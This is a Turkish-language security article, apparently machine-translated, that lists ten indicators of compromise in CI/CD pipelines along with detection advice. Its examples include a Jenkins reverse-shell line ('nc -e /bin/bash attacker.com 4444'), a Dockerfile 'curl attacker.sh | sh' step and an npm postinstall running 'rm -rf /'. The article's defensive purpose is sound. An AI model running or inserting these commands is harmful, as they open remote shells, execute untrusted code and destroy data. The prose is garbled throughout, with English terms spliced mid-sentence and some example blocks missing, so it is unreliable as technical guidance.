Giriş: Siber Güvenlikte Güvenlik İhlali Göstergeleri Nelerdir?
Güvenlik ihlali göstergeleri, sisteminizin veya güvenliğinizin tehlikeye girdiğine dair ilk uyarı işaretleridir. pipeline Saldırı altında olabilir. Basitçe söylemek gerekirse, uzlaşma göstergeleri Saldırganların bıraktığı izler, tuhaf şeyler gibidir. loginDosya değişiklikleri veya gizli kötü amaçlı yazılımlar gibi durumlar. IOC siber güvenliğiBunlar, suç mahallindeki parmak izleri gibi davranarak, bir şeylerin yanlış gittiğine dair net kanıt sunarlar. Bu nedenle, geliştiriciler sorduğunda... Uzlaşmanın göstergeleri nelerdir?Yanıt yalnızca sunucular veya güvenlik duvarlarıyla sınırlı değil, modern sistemlerde gizli olan riskleri de içeriyor. CI/CD pipelines.
Bunların içinden pipelineSaldırganlar, fark edilmeden kodda değişiklik yapabilir, kötü amaçlı bağımlılıklar ekleyebilir veya derleme adımlarını değiştirebilirler. Ancak çoğu kılavuz hala yalnızca sunuculara veya ağlara odaklanmaktadır. Sonuç olarak, yazılım tedarik zinciri en kolay hedeflerden biri haline gelmiştir.
Bu nedenle uzlaşma belirtileri bulmak önemlidir. CI/CD pipelineBu çok önemlidir. Her şeyden önce, ekiplerin kötü amaçlı yazılımları engellemesine, sırları korumasına ve yazılım teslimatının her aşamasını güvence altına almasına yardımcı olur.
Uzlaşmanın En Önemli 10 Göstergesi CI/CD Pipelines
Güvenlik ihlali göstergelerini açıklarken, çoğu liste sunuculara veya ağlara odaklanır. Ancak CI/CD pipelineSaldırganlar çok farklı izler bırakırlar. Bu sinyalleri tanımak, proaktif savunma için çok önemlidir. Aşağıda, her geliştirici ve güvenlik mühendisinin dikkat etmesi gereken 10 IOC siber güvenlik uyarı işareti bulunmaktadır.
1. Şüpheli Bağımlılık Değişiklikleri
Uzlaşmanın başlıca göstergelerinden biri... pipelineBu, ani ve garip bir bağımlılık güncellemesidir. Saldırganlar genellikle geliştiricilerin paket yöneticilerine duyduğu güveni kullanarak tehlikeli paketler eklerler.
Örneğin, npm'de bir package.json diff aniden şunları içerebilir:
Bu tür değişiklikler güvenli görünse de, her derlemeye truva atı bulaşmış kod enjekte edebilir.
Etki: Güvenliği ihlal edilmiş yazılımlar, kötü amaçlı yazılımları kaynağından devralır.
Algılama: Bağımlılık incelemelerini zorunlu kılın, kilit dosyası farklarını takip edin ve yeni paketleri sürekli olarak tarayın.
2. Derlemelerde Gizlenmiş Kod
Kötü amaçlı yazılım yazarları, incelemelerden kaçınmak için kod gizleme yöntemine başvururlar. Sonuç olarak, bu durum güvenlik açığının bir göstergesidir. CI/CD pipelineGizlenmiş zararlı yazılımlar yakalanması en zor olanlardan biri olabilir. Aslında, gizlenmiş zararlı yazılımlar genellikle açık kaynaklı kütüphanelere veya konteyner imajlarına fark edilmeden sızar.
Örneğin:
- PyPI paketi kullanılarak
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Gereksiz UPX ikili dosyalarıyla doldurulmuş bir Docker imajı.
- JavaScript dolu
\x41\x42Kimlik bilgilerini çalanların saklandığı yerlerden kaçıyor.
Etki: Gizli kod, derleme veya çalışma zamanında sessizce yürütülür; bu da onu IOC siber güvenliğinde kritik bir sinyal haline getirir.
Algılama: Birleştirmek SAST Kötü amaçlı yazılım taramasıyla şifrelenmiş veya paketlenmiş kodu işaretleyin. Her şeyden önce, gizleme yöntemini daha fazla araştırma gerektiren bir uyarı işareti olarak değerlendirin.
3. Git'te Açığa Çıkan Sırlar: Klasik Bir IOC Siber Güvenlik Riski
CI/CD pipelineS'ler genellikle sırları doğrudan depolardan devralır. Ancak, Git'te gizli bilgiler göründüğündeBu durum, "uzlaşmanın göstergeleri nelerdir?" sorusuna verilebilecek en net yanıtlardan biri haline geliyor. pipeline"Kimlik bilgileri Git'e bir kez girdikten sonra, saldırganlar bunları süresiz olarak istismar edebilirler."
Örneğin:
- A
.enviçeren dosyaAWS_SECRET_KEY=. - Tokenlar içeri itildi
config.json. - Silindikten sonra bile gizli bilgiler Git geçmişinde görünmeye devam eder.
Etki: Açığa çıkan anahtarlar, saldırganlara doğrudan erişim imkanı sağlar. CI/CD pipelineBulut sistemleri veya veritabanları gibi sistemlere yönelik saldırılar, güvenlik ihlalinin en tehlikeli göstergelerinden biridir.
Algılama: Kullanım pre-commit hooks Ayrıca, gizli bilgilerin taranması için CI işlemlerini gerçekleştirin ve sızdırılan anahtarları derhal iptal edin. Ek olarak, maruz kalma sürelerini azaltmak için otomatik düzeltme işlemlerini uygulayın.
4. Kurcalanmış Pipeline Yapılandırmalar: Güvenlik İhlalinin Gizli Göstergeleri
Pipeline Yapılandırma dosyaları yüksek değerli hedeflerdir çünkü Tek bir değişiklik çoğu zaman tüm iş akışını alt üst edebiliyor.Sonuç olarak, üzerinde oynanmış. pipeline Dosyalar, geleneksel izleme araçlarının nadiren tespit ettiği, IOC için büyük bir siber güvenlik riski oluşturmaktadır.
Örneğin:
GitHub Actions'da:
- GitLab'de: Kötü amaçlı bir iş eklendi.
.gitlab-ci.ymlHassas verileri sızdıran bir sistem. - Jenkins'te:
sh "nc -e /bin/bash attacker.com 4444".
Etki: Onaylanmamış bu değişiklikler sizin pipeline Bu durum, saldırganlar için kalıcı bir arka kapı oluşturur ve bu da açıkça bir güvenlik ihlalinin göstergesidir.
Algılama: İmzalı yapılandırmaları zorunlu kılın, PR onaylarını gerektirin ve beklenmeyen işleri izleyin. Ek olarak, ayarlayın. guardrails Değiştirilen iş akışlarını otomatik olarak engelleyen.
5. ayrıcalıklı IaC Varsayılanları
Yanlış yapılandırılmış altyapı tanımları genellikle gizli arka kapılar oluşturur. Sonuç olarak, ayrıcalıklı varsayılan ayarlar şu durumlarda sorun yaratır: IaC Bunlar, uluslararası operasyon merkezleri için klasik bir siber güvenlik riskidir.
Örneğin:
- Pod'lara izin veren bir Kubernetes dağıtımı
privileged: true. - Helm şemaları, servisleri şu şekilde gösteriyor:
0.0.0.0:22.
Etki: Saldırganlar kök düzeyinde erişim elde eder veya iç hizmetleri herkese açık hale getirir. Sonuç olarak, bu sorunlar saldırı yüzeyini önemli ölçüde genişletir.
Algılama: Uygula IaC Birleştirmeden önce en az ayrıcalık ilkesini uygulamak için tarama yapılır. Ayrıca, her yapılandırmanın gözden geçirilmesi sağlanır. pipeline.
6. Alışılmadık Yapı Davranışları
Saldırganlar sıklıkla değişiklik yaparlar. pipeline Kötü amaçlı eylemlere yol açabilecek davranışlar. Başka bir deyişle, olağandışı derleme etkinliği, bir sistemin güvenliğinin ihlal edildiğinin göstergelerine verilebilecek en net yanıtlardan biridir. CI/CD pipelines.
Örneğin:
- Garip alan adlarına giden ağ istekleri gönderen yapılar.
- Bir Node.js projesi aniden PowerShell'i çalıştırmaya başladı.
npm install. - CI işlemi, derleme komut dosyalarında tanımlanmamış büyük boyutlu ikili dosyaları indiriyor.
Etki: Güvenliği ihlal edilmiş yapılar, kötü amaçlı yazılım dağıtım noktaları olarak işlev görebilir. Her şeyden önemlisi, kötü amaçlı yazılımları her dağıtıma yayarlar.
Algılama: Beklenmeyen süreçler veya bağlantılar için derleme günlüklerini izleyin. Ayrıca, normalin dışında kalan davranışları işaretlemek için anormallik tespitini yapılandırın.
7. Kötü Amaçlı Paket Komut Dosyaları, Siber Güvenlik Riskleri Açısından Bir Gösterge Niteliğindedir
Paket yöneticileri yaşam döngüsünü destekler. hooks Saldırganların istismar ettiği durumlar söz konusudur. Bu nedenle, npm, PyPI veya Dockerfile'lardaki kötü amaçlı komut dosyaları, güvenlik ihlalinin güçlü göstergeleridir.
Örneğin:
- npm:
postinstallkomut dosyası çalışıyorrm -rf /veya bir C2'ye işaret göndermek. - PyPI:
setup.pyKurulum sırasında gizli Python kodunun çalıştırılması. - Docker dosyası:
RUN curl attacker.sh | sh.
Etki: Saldırı, herhangi bir çalışma zamanı testi yapılmadan önce, kurulum sırasında gerçekleşir. Sonuç olarak, geliştiriciler çok geç olana kadar bunu asla fark etmeyebilirler.
Algılama: Paket bildirim dosyalarını kurulum komut dosyaları açısından tarayın. Ayrıca, riskli olanları kısıtlayın. hooks in CI/CD Maruz kalmayı azaltmak için işler.
8. Kayıt Zehirlenmesi: Güvenlik İhlali Göstergeleri
Saldırganlar kayıt defterlerindeki öğeleri değiştirir veya düzenler ve bu olaylar, tedarik zincirinde güvenlik ihlalinin göstergeleri olarak ders kitaplarında yer alan örneklerdir. pipelines.
Örneğin:
- Bir Docker imaj etiketi, truva atı bulaşmış bir katmanla sessizce güncellendi.
- Dahili bir paket, bozuk bir sürümle değiştirildi.
- npm ad alanı gaspı, örneğin
lodash-proxy.
Etki: Kayıt defteri yapısını kullanan her derleme tehlikeye girer. Sadece bu da değil, bu tehlike alt hizmetlere de yayılır.
Algılama: Tüm kayıt defteri çekimlerinde imza ve bütünlük kontrollerini uygulayın. Ayrıca, yapıtın kaynağını takip edin. SBOM doğrulama.
9. Anormal Kullanıcı Aktivitesi, IOC Kanıtı Olarak
Ele geçirilen hesaplar neredeyse her zaman anormal izler bırakır. Dolayısıyla, geliştiricilerin olağan dışı davranışları, uzlaşmanın güçlü bir göstergesidir.
Örneğin:
- CommitYerel saatle sabah 3'te harekete geçildi.
- Tatilde olan muhasebeciler tarafından yapılan PR onayları.
- Pipelines, alışılmadık bir sıklıkla tetikleniyor.
Etki: Saldırganlar, çalınan kimlik bilgilerini kötüye kullanarak zararlı değişiklikler eklerler. Sonuçta, yetkisiz erişim... commitNormal iş akışlarına kolayca entegre olurlar.
Algılama: İzliyoruz SCM Anormallikler için aktivite takibi yapın, çok faktörlü kimlik doğrulamayı (MFA) uygulayın ve token'ları düzenli olarak değiştirin. Ayrıca, şüpheli durumlarda uyarı verin. commit veya onay modelleri.
10. IOC Siber Güvenliğinde Başarısız Bütünlük veya İmza Kontrolleri
Yaygın ama göz ardı edilen bir durum uzlaşma göstergesi Bu, başarısız bir bütünlük veya imza kontrolüdür. IOC siber güvenliğinde, bu kontroller kodun veya yapıtların orijinalliğini doğrular. Bunları atlamak, başarısız bir bütünlük veya imza kontrolüne yol açar. pipelineaçığa çıktı.
Örnekler:
- Beklenen sağlama toplamıyla eşleşmeyen bir SHA256 özeti.
- Eksik veya geçersiz bir GPG imzası.
- An SBOM İmzasız eserleri gösteriyor.
Etki: Bütünlük hataları genellikle kurcalama, kayıt defteri zehirlenmesi veya kötü amaçlı yazılım bulaştırma anlamına gelir.
Algılama: İmza kontrollerini otomatikleştirin, sağlama toplamı doğrulamasını zorunlu kılın ve imzasız bileşenleri engelleyin. Her şeyden önemlisi, başarısız olan her kontrolü açık bir güvenlik ihlali kanıtı olarak değerlendirin.
CI/CD Uzlaşma Göstergelerine Genel Bakış
| Uzlaşma Göstergesi (IOC) | Etki CI/CD Pipelines | Nasıl Algılanır |
|---|---|---|
| Şüpheli Bağımlılık Değişiklikleri | Saldırganlar, paket yöneticilerine kötü amaçlı kütüphaneler enjekte ederek derleme işlemlerinin güvenliğinin tehlikeye girmesine neden oluyor. | Kilit dosyası farklarını takip edin, bağımlılık incelemelerini zorunlu kılın ve bağımlılıkları sürekli olarak tarayın. |
| Derlemelerde Gizlenmiş Kod | Gizli zararlı yazılımlar, derleme veya çalışma zamanında tespit edilmeden yürütülür. | Kullanım SAST Ayrıca, base64, onaltılık veya sıkıştırılmış kod kalıplarını işaretlemek için kötü amaçlı yazılım taraması da yapar. |
| Git'te Sırlar Açığa Çıktı | Sızdırılan token'lar veya API anahtarları, saldırganlara kritik sistemlere doğrudan erişim olanağı sağlar. | Git'te gizli taramaları çalıştırın. hooks ve sızdırılan kimlik bilgilerini otomatik olarak iptal eder. |
| Kurcalanmış Pipeline Konfigürasyonlar | Değiştirilmiş iş akışları, verilerin dışarı sızdırılmasına veya içeride kalıcı olarak saklanmasına olanak tanır. CI/CD. | PR onaylarını zorunlu kılın, imzalı yapılandırmaları uygulayın ve izleyin. pipeline değişir. |
| Ayrıcalıklı IaC Varsayılanları | Aşırı müsamahakar roller veya güvensiz varsayılan ayarlar, bulut ortamlarını risk altına sokar. | Terraform, Kubernetes ve Helm dosyalarını en az ayrıcalık ilkesinin uygulanması açısından tarayın. |
| Alışılmadık Yapı Davranışları | PipelineBunlar, kötü amaçlı yazılım dağıtım noktaları veya yatay hareket için kullanılır. | Beklenmeyen indirmeler, işlemler veya giden aramalar için derleme günlüklerini analiz edin. |
| Kötü Amaçlı Paket Komut Dosyaları | Gizli ön/son kurulum komut dosyaları, çalışma zamanı testlerinden önce zararlı yazılımları tetikler. | Riskli npm/PyPI komut dosyalarını engelleyin ve yürütülmesini kısıtlayın. CI/CD Meslekler. |
| Kayıt Zehirlenmesi | Truva atı bulaşmış dosyalar, kayıt defterlerindeki güvenilir görüntü veya ikili dosyaların yerini alıyor. | Sağlama toplamlarını doğrulayın, imza doğrulamasını uygulayın ve kayıt defterlerini proaktif olarak tarayın. |
| Anormal Kullanıcı Etkinliği | Ele geçirilen hesaplar kötü amaçlı yazılımlar yayıyor. commits veya tetikleyici pipelines. | Çok faktörlü kimlik doğrulamasını (MFA) uygulayın, izleyin. commitanormallikleri tespit edin ve analiz edin. login desenler. |
| Bütünlük veya İmza Kontrollerinde Başarısızlık | Değiştirilmiş kod, bağımlılıklar veya resimlerin sisteme girdiğini gösterir. pipeline. | Bütünlük kontrollerini otomatikleştirin ve imzasız veya uyumsuz bileşenleri engelleyin. |
Geleneksel IOC Siber Güvenlik Sistemlerinin Eksiklikleri Nelerdir? CI/CD Riskler
Çoğu kuruluş zaten sunucularda, bilgisayarlarda veya ağlarda güvenlik ihlali göstergelerini izlemektedir. Ancak, IOC siber güvenliğine yönelik bu klasik yaklaşım şunları göz ardı etmektedir: CI/CD pipelineŞu anda en kritik saldırı yüzeylerinden biri olan bu noktalar, aslında en kritik saldırı yüzeylerinden biridir. pipelineBu araçlar, geleneksel araçların tespit edemediği benzersiz uzlaşma sinyalleri gösterir.
Geleneksel Güvenlikte Güvenlik İhlali Göstergeleri
Geleneksel IOC siber güvenliğinde odak noktası genellikle şunlardır:
- Olağandışı loginÇalınmış kimlik bilgilerini düşündüren e-posta adresleri veya IP adresleri.
- Kötü amaçlı yazılımları ortaya çıkaran şüpheli dosya özetleri veya kayıt defteri değişiklikleri.
- Veri sızıntısına işaret eden beklenmedik giden trafik.
Bunlar, aynı zamanda takip edilen iyi bilinen göstergelerdir. MITRE ATT & CK çerçevesiBu, düşmanların yaygın davranışlarını ve taktiklerini haritalandıran bir araçtır. Bunlar faydalı sinyallerdir. Ancak, çoğunlukla işletim sistemleri veya kurumsal ağlar için geçerlidirler. Sonuç olarak, yazılım tedarik zincirinin daha önceki aşamalarında gerçekleşen ince müdahaleleri gözden kaçırırlar.
Neden Şimdi CI/CD Pipelines Farklıdır
CI/CD pipelines, geliştiricilerin kullandığı otomatikleştirilmiş ortamlardır. commit Kod yazma, bağımlılıkları çekme ve derlemeleri yayınlama gibi süreçlerde saldırganlar, burada meydana gelen bir güvenlik açığının her dağıtıma yansıyacağını bilirler. Buna göre, güvenlik açığının göstergeleri nelerdir? CI/CD pipelineS? Çok farklı görünüyorlar:
- Kötü amaçlı bir bağımlılık, package.json veya requirements.txt dosyasına sessizce eklendi.
- Git'te kullanıma sunulan API anahtarları veya belirteçleri commit.s veya .env dosyaları.
- npm veya PyPI paketlerine enjekte edilen gizlenmiş kod.
- `privileged: true` gibi güvensiz varsayılan değerlere sahip Terraform veya Kubernetes dosyaları.
- Pipeline Veri sızdırmak veya arka kapılar açmak için düzenlenmiş işler.
Bu uzlaşma sinyalleri şunlardadır: CI/CD görünmez kalmak standard güvenlik araçları.
Uluslararası Operasyon Merkezleri'ndeki Siber Güvenlik Açığı
Birçok ekip, güvenlik ihlali göstergelerinin değerini anlasa da, hala yalnızca sunuculardan ve ağ günlüklerinden gelen tespitlere güveniyor. Bu nedenle, saldırganlar normal izler bırakmadan derlemeleri zehirleyebilir veya kötü amaçlı yazılım ekleyebilir. İşte bu yüzden XZ Utils arka kapısı veya kötü amaçlı npm paketleri gibi olaylar, üretime ulaşana kadar tespit edilemedi.
Bu tür tedarik zinciri uzlaşmaları ayrıca şu nedenlerle de vurgulanmaktadır: CISA'nın tedarik zinciri güvenliği kılavuzuSaldırganların giderek daha çok bu tür saldırıları hedef aldığı konusunda uyarıda bulunan bir rapor. CI/CD pipelineve kayıtlar.
Takeaway
Geleneksel IOC siber güvenliği gerekli ancak yeterli değil. Her şeyden önce, ekipler, kendilerine özgü güvenlik ihlali göstergelerini tanımalıdır. CI/CD pipelineAncak o zaman kötü amaçlı kodları tespit edebilirler. pipeline İstismarın farklı ortamlara yayılmadan önce önlenmesi.




